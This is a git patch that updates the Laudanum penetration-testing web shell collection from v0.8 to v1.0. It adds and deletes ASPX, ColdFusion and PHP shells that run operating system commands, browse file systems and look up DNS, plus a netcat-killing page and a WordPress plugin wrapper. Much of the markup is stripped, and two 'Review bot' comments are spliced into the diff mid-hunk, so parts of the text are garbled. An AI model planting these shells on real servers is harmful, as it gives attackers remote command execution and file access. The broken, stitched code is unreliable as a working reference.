From 465897e5566188076d0a9d9bf98e1137c514add8 Mon Sep 17 00:00:00 2001 
From: Jitendra Patro <86168235+Xhoenix@users.noreply.github.com>
Date: Thu, 18 May 2023 17:39:10 +0530
Subject: [PATCH] updated to laudanum v1.0
---
Web-Shells/laudanum-0.8/aspx/dns.aspx | 144 -------
Web-Shells/laudanum-0.8/aspx/file.aspx | 154 -------
Web-Shells/laudanum-0.8/cfm/shell.cfm | 80 ----
.../{laudanum-0.8 => laudanum-1.0}/CREDITS | 10 +-
Web-Shells/{laudanum-0.8 => laudanum-1.0}/GPL | 0
.../{laudanum-0.8 => laudanum-1.0}/README | 4 +-
.../asp/dns.asp | 8 +-
.../asp/file.asp | 8 +-
.../asp/proxy.asp | 10 +-
.../asp/shell.asp | 8 +-
.../aspx/shell.aspx | 8 +-
Web-Shells/laudanum-1.0/cfm/shell.cfm | 99 +++++
.../jsp/cmd.war | Bin
.../jsp/makewar.sh | 0
.../jsp/warfiles/META-INF/MANIFEST.MF | 0
.../jsp/warfiles/WEB-INF/web.xml | 0
.../jsp/warfiles/cmd.jsp | 2 +-
.../php/dns.php | 10 +-
.../php/file.php | 13 +-
Web-Shells/laudanum-1.0/php/host.php | 142 +++++++
Web-Shells/laudanum-1.0/php/killnc.php | 119 ++++++
.../php/php-reverse-shell.php | 0
.../php/proxy.php | 10 +-
.../php/shell.php | 8 +-
.../laudanum-1.0/wordpress/laudanum.php | 108 +++++
.../laudanum-1.0/wordpress/templates/dns.php | 144 +++++++
.../laudanum-1.0/wordpress/templates/file.php | 182 ++++++++
.../laudanum-1.0/wordpress/templates/host.php | 126 ++++++
.../wordpress/templates/ipcheck.php | 61 +++
.../wordpress/templates/killnc.php | 103 +++++
.../wordpress/templates/php-reverse-shell.php | 194 +++++++++
.../wordpress/templates/proxy.php | 336 +++++++++++++++
.../wordpress/templates/settings.php | 67 +++
.../wordpress/templates/shell.php | 389 ++++++++++++++++++
34 files changed, 2119 insertions(+), 428 deletions(-)
delete mode 100755 Web-Shells/laudanum-0.8/aspx/dns.aspx
delete mode 100755 Web-Shells/laudanum-0.8/aspx/file.aspx
delete mode 100644 Web-Shells/laudanum-0.8/cfm/shell.cfm
rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/CREDITS (80%)
rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/GPL (100%)
rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/README (93%)
rename 
Web-Shells/{laudanum-0.8 => laudanum-1.0}/asp/dns.asp (95%) mode change 100755 => 100644 rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/asp/file.asp (96%) mode change 100755 => 100644 rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/asp/proxy.asp (97%) mode change 100755 => 100644 rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/asp/shell.asp (92%) mode change 100755 => 100644 rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/aspx/shell.aspx (95%) mode change 100755 => 100644 create mode 100644 Web-Shells/laudanum-1.0/cfm/shell.cfm rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/jsp/cmd.war (100%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/jsp/makewar.sh (100%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/jsp/warfiles/META-INF/MANIFEST.MF (100%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/jsp/warfiles/WEB-INF/web.xml (100%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/jsp/warfiles/cmd.jsp (94%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/php/dns.php (94%) mode change 100755 => 100644 rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/php/file.php (92%) mode change 100755 => 100644 create mode 100644 Web-Shells/laudanum-1.0/php/host.php create mode 100644 Web-Shells/laudanum-1.0/php/killnc.php rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/php/php-reverse-shell.php (100%) rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/php/proxy.php (97%) mode change 100755 => 100644 rename Web-Shells/{laudanum-0.8 => laudanum-1.0}/php/shell.php (98%) mode change 100755 => 100644 create mode 100644 Web-Shells/laudanum-1.0/wordpress/laudanum.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/dns.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/file.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/host.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/ipcheck.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/killnc.php create mode 100755 
Web-Shells/laudanum-1.0/wordpress/templates/php-reverse-shell.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/proxy.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/settings.php create mode 100644 Web-Shells/laudanum-1.0/wordpress/templates/shell.php diff --git a/Web-Shells/laudanum-0.8/aspx/dns.aspx b/Web-Shells/laudanum-0.8/aspx/dns.aspx deleted file mode 100755 index c9911b39..00000000 --- a/Web-Shells/laudanum-0.8/aspx/dns.aspx +++ /dev/null @@ -1,144 +0,0 @@ -<%@ Page Language="C#"%> -<%@ Import Namespace="System" %> -Laudanum - DNS - -
-QUERY:
-Type: -
-STDOUT:
-
<% = stdout.Replace("<", "<") %>
-
-
-
-STDERR:
-
<% = stderr.Replace("<", "<") %>
- - - diff --git a/Web-Shells/laudanum-0.8/aspx/file.aspx b/Web-Shells/laudanum-0.8/aspx/file.aspx deleted file mode 100755 index d0924392..00000000 --- a/Web-Shells/laudanum-0.8/aspx/file.aspx +++ /dev/null @@ -1,154 +0,0 @@ -<%@ Page Language="C#"%> -<%@ Import Namespace="System" %> -Laudanum - File - - - -<% string[] breadcrumbs = dir.Split('\\'); - string breadcrumb = ""; - foreach (string b in breadcrumbs) - { - if (b.Length > 0) - { - breadcrumb += b + "\\"; - Response.Write("" + Server.HtmlEncode(b) + ""); - Response.Write(" / "); - } - } - %> - - -<% - try - { - if (System.IO.Directory.Exists(dir)) - { - string[] folders = System.IO.Directory.GetDirectories(dir); - foreach (string folder in folders) - { - Response.Write(""); - } - } - else - { - Response.Write("This directory doesn't exist: " + Server.HtmlEncode(dir)); - Response.End(); - } - - } - catch (System.UnauthorizedAccessException ex) - { - Response.Write("You Don't Have Access to this directory: " + Server.HtmlEncode(dir)); - Response.End(); - } - %> - -<% - System.IO.DirectoryInfo di = new System.IO.DirectoryInfo(dir); - System.IO.FileInfo[] files = di.GetFiles(); - foreach (System.IO.FileInfo f in files) - { - Response.Write(""); - } - %> -
NameDateSize
" + Server.HtmlEncode(folder) + "
" + Server.HtmlEncode(f.Name) + "" + f.CreationTime.ToString() + "" + f.Length.ToString() + "
- - \ No newline at end of file diff --git a/Web-Shells/laudanum-0.8/cfm/shell.cfm b/Web-Shells/laudanum-0.8/cfm/shell.cfm deleted file mode 100644 index be0466bf..00000000 --- a/Web-Shells/laudanum-0.8/cfm/shell.cfm +++ /dev/null @@ -1,80 +0,0 @@ - - - - - - - - -Laudanum Coldfusion Shell - - - -Executable: For Windows use: cmd.exe or the full path to cmd.exe
-Arguments: For Windows use: /c command
- -Executable:
-Arguments:
-
- - - - -
-
-#Replace(foo, "<", "<", "All")#
-
-
-Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware. - -
-
- Copyright © 2012, Kevin Johnson and the Laudanum team.
- Written by Tim Medin.
- Get the latest version at laudanum.secureideas.net. -
- - diff --git a/Web-Shells/laudanum-0.8/CREDITS b/Web-Shells/laudanum-1.0/CREDITS similarity index 80% rename from Web-Shells/laudanum-0.8/CREDITS rename to Web-Shells/laudanum-1.0/CREDITS index 69b9a810..d6c76006 100644 --- a/Web-Shells/laudanum-0.8/CREDITS +++ b/Web-Shells/laudanum-1.0/CREDITS @@ -2,16 +2,14 @@ The Team ======================================================== - Kevin Johnson - Project Lead - -- Justin Searle - - Core Developer - Tim Medin - - Core Developer + - Project Lead -- James Jardine - - Core Developer +- Justin Searle + - Core Developer Additional Coding ======================================================== - Robin Wood +- Jason Gillam (Wordpress Plugin) \ No newline at end of file diff --git a/Web-Shells/laudanum-0.8/GPL b/Web-Shells/laudanum-1.0/GPL similarity index 100% rename from Web-Shells/laudanum-0.8/GPL rename to Web-Shells/laudanum-1.0/GPL diff --git a/Web-Shells/laudanum-0.8/README b/Web-Shells/laudanum-1.0/README similarity index 93% rename from Web-Shells/laudanum-0.8/README rename to Web-Shells/laudanum-1.0/README index 2a301ae6..0d690cc3 100644 --- a/Web-Shells/laudanum-0.8/README +++ b/Web-Shells/laudanum-1.0/README @@ -1,4 +1,4 @@ -Laudanum: Injectable Web Exploit Code v0.4 +Laudanum: Injectable Web Exploit Code v0.8 By Kevin Johnson and the Laudanum Development Team @@ -9,7 +9,7 @@ Sourceforge Site: http://sourceforge.net/projects/laudanum SVN : svn co https://laudanum.svn.sourceforge.net/svnroot/laudanum laudanum ------------------------------------------------------------------------------- -** Copyright (C) 2012 Kevin Johnson and the Laudanum Project Team +** Copyright (C) 2014 Kevin Johnson and the Laudanum Project Team ** ** This program is free software; you can redistribute it and/or modify ** it under the terms of the GNU General Public License as published by 
diff --git a/Web-Shells/laudanum-0.8/asp/dns.asp b/Web-Shells/laudanum-1.0/asp/dns.asp old mode 100755 new mode 100644 similarity index 95% rename from Web-Shells/laudanum-0.8/asp/dns.asp rename to Web-Shells/laudanum-1.0/asp/dns.asp index 317c3ee1..719d1e7f --- a/Web-Shells/laudanum-0.8/asp/dns.asp +++ b/Web-Shells/laudanum-1.0/asp/dns.asp @@ -10,14 +10,14 @@ ' *** ' *** Project Leads: ' *** Kevin Johnson +' *** Tim Medin ' *** -' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** ' ******************************************************************************** ' *** ' *** This file provides access to DNS on the system. -' *** Written by Tim Medin +' *** Written by Tim Medin ' *** ' ******************************************************************************** ' *** This program is free software; you can redistribute it and/or @@ -143,7 +143,7 @@ end if %>
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-0.8/asp/file.asp b/Web-Shells/laudanum-1.0/asp/file.asp old mode 100755 new mode 100644 similarity index 96% rename from Web-Shells/laudanum-0.8/asp/file.asp rename to Web-Shells/laudanum-1.0/asp/file.asp index cc0faff8..94e2af11 --- a/Web-Shells/laudanum-0.8/asp/file.asp +++ b/Web-Shells/laudanum-1.0/asp/file.asp @@ -13,14 +13,14 @@ ' *** ' *** Project Leads: ' *** Kevin Johnson +' *** Tim Medin ' *** -' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** ' ******************************************************************************** ' *** ' *** This file provides access to the file system. -' *** Written by Tim Medin +' *** Written by Tim Medin ' *** ' ******************************************************************************** ' *** This program is free software; you can redistribute it and/or @@ -170,7 +170,7 @@ next
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-0.8/asp/proxy.asp b/Web-Shells/laudanum-1.0/asp/proxy.asp old mode 100755 new mode 100644 similarity index 97% rename from Web-Shells/laudanum-0.8/asp/proxy.asp rename to Web-Shells/laudanum-1.0/asp/proxy.asp index d5db078f..edf12799 --- a/Web-Shells/laudanum-0.8/asp/proxy.asp +++ b/Web-Shells/laudanum-1.0/asp/proxy.asp @@ -13,14 +13,14 @@ ' *** ' *** Project Leads: ' *** Kevin Johnson +' *** Tim Medin ' *** -' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** ' ******************************************************************************** ' *** ' *** This file provides access as a proxy. -' *** Written by Tim Medin +' *** Written by Tim Medin ' *** ' ******************************************************************************** ' *** This program is free software; you can redistribute it and/or @@ -74,7 +74,7 @@ function err_handler() <%=Err.Message%>

- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
@@ -341,7 +341,7 @@ if len(FullUrl) = 0 then
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-0.8/asp/shell.asp b/Web-Shells/laudanum-1.0/asp/shell.asp old mode 100755 new mode 100644 similarity index 92% rename from Web-Shells/laudanum-0.8/asp/shell.asp rename to Web-Shells/laudanum-1.0/asp/shell.asp index 0cdc7c63..39af9f95 --- a/Web-Shells/laudanum-0.8/asp/shell.asp +++ b/Web-Shells/laudanum-1.0/asp/shell.asp @@ -10,14 +10,14 @@ ' *** ' *** Project Leads: ' *** Kevin Johnson +' *** Tim Medin ' *** -' *** Copyright 2012 by Kevin Johnson and the Laudanum Team +' *** Copyright 2014 by Kevin Johnson and the Laudanum Team ' *** ' ******************************************************************************** ' *** ' *** Updated and fixed by Robin Wood -' *** Updated and fixed by Tim Medin

-Copyright © 2012, Kevin Johnson and the Laudanum team.
+Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-0.8/aspx/shell.aspx b/Web-Shells/laudanum-1.0/aspx/shell.aspx old mode 100755 new mode 100644 similarity index 95% rename from Web-Shells/laudanum-0.8/aspx/shell.aspx rename to Web-Shells/laudanum-1.0/aspx/shell.aspx index cae76650..b6df6cbb --- a/Web-Shells/laudanum-0.8/aspx/shell.aspx +++ b/Web-Shells/laudanum-1.0/aspx/shell.aspx @@ -14,9 +14,9 @@ *** *** Project Leads: *** Kevin Johnson -*** Tim Medin +*** Tim Medin *** -*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** ******************************************************************************** *** @@ -120,10 +120,10 @@ STDERR:

- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
- \ No newline at end of file + diff --git a/Web-Shells/laudanum-1.0/cfm/shell.cfm b/Web-Shells/laudanum-1.0/cfm/shell.cfm new file mode 100644 index 00000000..c5a02daf --- /dev/null +++ b/Web-Shells/laudanum-1.0/cfm/shell.cfm @@ -0,0 +1,99 @@ + + + + + + + + + + + + + + + + + + + + + + + Laudanum Coldfusion Shell + +
+ + Executable: For Windows use: cmd.exe or the full path to cmd.exe
+ Arguments: For Windows use: /c command
+ + Executable:
+ Arguments:
+
+ + + +
+ + + + + +
+    
+    #Replace(foo, "<", "<", "All")#
+    
+
+ + Note: The cold fusion command that executes shell commands strips quotes, both double and single, so be aware. + +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Bug fixes by Matt Presson
+ Get the latest version at laudanum.secureideas.net. +
+ + diff --git a/Web-Shells/laudanum-0.8/jsp/cmd.war b/Web-Shells/laudanum-1.0/jsp/cmd.war similarity index 100% rename from Web-Shells/laudanum-0.8/jsp/cmd.war rename to Web-Shells/laudanum-1.0/jsp/cmd.war diff --git a/Web-Shells/laudanum-0.8/jsp/makewar.sh b/Web-Shells/laudanum-1.0/jsp/makewar.sh similarity index 100% rename from Web-Shells/laudanum-0.8/jsp/makewar.sh rename to Web-Shells/laudanum-1.0/jsp/makewar.sh diff --git a/Web-Shells/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF b/Web-Shells/laudanum-1.0/jsp/warfiles/META-INF/MANIFEST.MF similarity index 100% rename from Web-Shells/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF rename to Web-Shells/laudanum-1.0/jsp/warfiles/META-INF/MANIFEST.MF diff --git a/Web-Shells/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml b/Web-Shells/laudanum-1.0/jsp/warfiles/WEB-INF/web.xml similarity index 100% rename from Web-Shells/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml rename to Web-Shells/laudanum-1.0/jsp/warfiles/WEB-INF/web.xml diff --git a/Web-Shells/laudanum-0.8/jsp/warfiles/cmd.jsp b/Web-Shells/laudanum-1.0/jsp/warfiles/cmd.jsp similarity index 94% rename from Web-Shells/laudanum-0.8/jsp/warfiles/cmd.jsp rename to Web-Shells/laudanum-1.0/jsp/warfiles/cmd.jsp index e33d3c00..fcf5308d 100644 --- a/Web-Shells/laudanum-0.8/jsp/warfiles/cmd.jsp +++ b/Web-Shells/laudanum-1.0/jsp/warfiles/cmd.jsp @@ -34,7 +34,7 @@ disr = dis.readLine();
-Copyright © 2012, Kevin Johnson and the Laudanum team.
+Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-0.8/php/dns.php b/Web-Shells/laudanum-1.0/php/dns.php old mode 100755 new mode 100644 similarity index 94% rename from Web-Shells/laudanum-0.8/php/dns.php rename to Web-Shells/laudanum-1.0/php/dns.php index 023927ff..3b6f65b1 --- a/Web-Shells/laudanum-0.8/php/dns.php +++ b/Web-Shells/laudanum-1.0/php/dns.php @@ -10,14 +10,14 @@ *** *** Project Leads: *** Kevin Johnson +*** Tim Medin *** -*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** ******************************************************************************** *** *** This file provides access to DNS on the system. -*** Written by Tim Medin +*** Written by Tim Medin *** ******************************************************************************** *** This program is free software; you can redistribute it and/or @@ -79,7 +79,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
@@ -152,7 +152,7 @@ if ($query != '') ?>
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-0.8/php/file.php b/Web-Shells/laudanum-1.0/php/file.php old mode 100755 new mode 100644 similarity index 92% rename from Web-Shells/laudanum-0.8/php/file.php rename to Web-Shells/laudanum-1.0/php/file.php index 97bf627a..83758ae5 --- a/Web-Shells/laudanum-0.8/php/file.php +++ b/Web-Shells/laudanum-1.0/php/file.php @@ -10,14 +10,15 @@ *** *** Project Leads: *** Kevin Johnson +*** Tim Medin *** -*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** ******************************************************************************** *** *** This file allows browsing of the file system. -*** Written by Tim Medin +*** Written by Tim Medin +*** 2013-12-28 Updated by Jason Gillam - fixed parent folder *** ******************************************************************************** *** This program is free software; you can redistribute it and/or @@ -79,7 +80,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
@@ -150,7 +151,7 @@ for ($i = 0; $i < count($dirs) - 2; $i++) { echo ""; echo ""; -echo ""; +echo ""; //get listing, separate into directories and files $listingfiles = array(); @@ -187,7 +188,7 @@ else {
NameDateSize
../
../

- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-1.0/php/host.php b/Web-Shells/laudanum-1.0/php/host.php new file mode 100644 index 00000000..acedb4b3 --- /dev/null +++ b/Web-Shells/laudanum-1.0/php/host.php 
@@ -0,0 +1,142 @@ + +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file provides a host lookup by ip address. +*** Adapted from Laudanum dns.php by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + +// ***************** Config entries below *********************** + +// IPs are enterable as individual addresses TODO: add CIDR support +$allowedIPs = array("19.168.2.16", "192.168.1.100"); + +# *********** No editable content below this line ************** + +$allowed = 0; +foreach ($allowedIPs as $IP) { + if ($_SERVER["REMOTE_ADDR"] == $IP) + $allowed = 1; +} + +if ($allowed == 0) { + header("HTTP/1.0 404 Not Found"); + die(); +} + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. 
*/ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Hostname by IP Lookup + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + +/* Initialize some variables we need again and again. */ +$query = isset($_POST['query']) ? $_POST['query'] : ''; +$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; +?> + + + + Laudanum Host Lookup + + + + + + +

Host Lookup 0.1

+
+
+ Host Lookup: +

IP: + + +

+
+ + +"; + echo "Result = "; + print_r($result); + echo ""; +} +?> +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Web-Shells/laudanum-1.0/php/killnc.php b/Web-Shells/laudanum-1.0/php/killnc.php new file mode 100644 index 00000000..8b6b026a --- /dev/null +++ b/Web-Shells/laudanum-1.0/php/killnc.php 
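Review bot: The default allowlist in the new php/host.php, `$allowedIPs = array("19.168.2.16", "192.168.1.100");`, starts with `19.168.2.16`, which is not in a private (RFC 1918) range and looks like a typo for `192.168.2.16`. If the file is ever left in place with the defaults, the `$_SERVER["REMOTE_ADDR"]` comparison admits whoever holds that external address, and that comparison is the only access check visible in this file. I would ship an empty default, `$allowedIPs = array(); // add the tester's address before deployment`, so an unedited copy answers 404 to everyone. The same default appears in php/killnc.php in this patch.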
@@ -0,0 +1,119 @@ + +*** Tim Medin +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file attempts to kill all netcat processes spawned by the current user. +*** This may be useful in cases where a reverse shell attempt has gone wrong. +*** +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. +*** +***************************************************************************** */ + + +// ***************** Config entries below *********************** + +// IPs are enterable as individual addresses TODO: add CIDR support +$allowedIPs = array("19.168.2.16", "192.168.1.100"); + +# *********** No editable content below this line ************** + +$allowed = 0; +foreach ($allowedIPs as $IP) { + if ($_SERVER["REMOTE_ADDR"] == $IP) + $allowed = 1; +} + +if ($allowed == 0) { + header("HTTP/1.0 404 Not Found"); + die(); +} + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. 
*/ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . "\n"; + } else { + die(' + + + Laudanum PHP Hostname by IP Lookup + + +

Fatal Error!

+

' . $errstr . '

+

in ' . $errfile . ', line ' . $errline . '.

+ +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + +'); + } +} + +set_error_handler('error_handler'); + + + +?> + + + + Laudanum Kill nc + + + + +

Kill nc 0.1

+ + +
+
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
+ Written by Tim Medin.
+ Get the latest version at laudanum.secureideas.net. +
+ + + diff --git a/Web-Shells/laudanum-0.8/php/php-reverse-shell.php b/Web-Shells/laudanum-1.0/php/php-reverse-shell.php similarity index 100% rename from Web-Shells/laudanum-0.8/php/php-reverse-shell.php rename to Web-Shells/laudanum-1.0/php/php-reverse-shell.php diff --git a/Web-Shells/laudanum-0.8/php/proxy.php b/Web-Shells/laudanum-1.0/php/proxy.php old mode 100755 new mode 100644 similarity index 97% rename from Web-Shells/laudanum-0.8/php/proxy.php rename to Web-Shells/laudanum-1.0/php/proxy.php index 1176fcde..4df6ad2a --- a/Web-Shells/laudanum-0.8/php/proxy.php +++ b/Web-Shells/laudanum-1.0/php/proxy.php @@ -11,14 +11,14 @@ ini_set('session.use_cookies', '0'); *** *** Project Leads: *** Kevin Johnson +*** Tim Medin *** -*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** ******************************************************************************** *** *** This file allows browsing of the file system. -*** Written by Tim Medin +*** Written by Tim Medin *** ******************************************************************************** *** This program is free software; you can redistribute it and/or @@ -81,7 +81,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
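Review bot: In the new php/killnc.php, `error_handler($errno, $errstr, $errfile, $errline, $errcontext)` declares a fifth required parameter that PHP 8 no longer passes to handlers registered with `set_error_handler`, so the first notice or warning raises an ArgumentCountError instead of reaching the handler body. Giving it a default, `function error_handler($errno, $errstr, $errfile, $errline, $errcontext = null) {`, keeps the handler valid on both PHP 7 and PHP 8. The handler's fatal-error page is also titled "Laudanum PHP Hostname by IP Lookup" and its comment refers to chdir(), both apparently carried over from another file; the title should match the page's own "Laudanum Kill nc". The same handler signature is used in php/host.php and wordpress/templates/dns.php in this patch.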
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
@@ -268,7 +268,7 @@ if ($url == "") {
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Written by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-0.8/php/shell.php b/Web-Shells/laudanum-1.0/php/shell.php old mode 100755 new mode 100644 similarity index 98% rename from Web-Shells/laudanum-0.8/php/shell.php rename to Web-Shells/laudanum-1.0/php/shell.php index a36848a0..8cf7500e --- a/Web-Shells/laudanum-0.8/php/shell.php +++ b/Web-Shells/laudanum-1.0/php/shell.php @@ -10,9 +10,9 @@ *** *** Project Leads: *** Kevin Johnson -*** Tim Medin +*** Tim Medin *** -*** Copyright 2012 by Kevin Johnson and the Laudanum Team +*** Copyright 2014 by Kevin Johnson and the Laudanum Team *** ******************************************************************************** *** @@ -87,7 +87,7 @@ function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
- Copyright © 2012, Kevin Johnson and the Laudanum team.
Get the latest version at laudanum.secureideas.net.
@@ -400,7 +400,7 @@ echo rtrim($padding . $_SESSION['output']);
- Copyright © 2012, Kevin Johnson and the Laudanum team.
+ Copyright © 2014, Kevin Johnson and the Laudanum team.
Updated by Tim Medin.
Get the latest version at laudanum.secureideas.net.
diff --git a/Web-Shells/laudanum-1.0/wordpress/laudanum.php b/Web-Shells/laudanum-1.0/wordpress/laudanum.php new file mode 100644 index 00000000..ecca21f3 --- /dev/null +++ b/Web-Shells/laudanum-1.0/wordpress/laudanum.php 
@@ -0,0 +1,108 @@ + +*** Tim Medin +*** +*** Copyright 2014 by Kevin Johnson and the Laudanum Team +*** +******************************************************************************** +*** +*** This file is a Word Press plugin wrapper for Laudanum's PHP tools. As with +*** other Word Press plugins, this entire directory should be zipped up for deployment. +*** The templates/ipcheck.php file should be updated with the tester's IP address first. +*** +*** Written by Jason Gillam +*** +******************************************************************************** +*** This program is free software; you can redistribute it and/or +*** modify it under the terms of the GNU General Public License +*** as published by the Free Software Foundation; either version 2 +*** of the License, or (at your option) any later version. +*** +*** This program is distributed in the hope that it will be useful, +*** but WITHOUT ANY WARRANTY; without even the implied warranty of +*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +*** GNU General Public License for more details. +*** +*** You can get a copy of the GNU General Public License from this +*** address: http://www.gnu.org/copyleft/gpl.html#SEC1 +*** You can also write to the Free Software Foundation, Inc., 59 Temple +*** Place - Suite 330, Boston, MA 02111-1307, USA. 
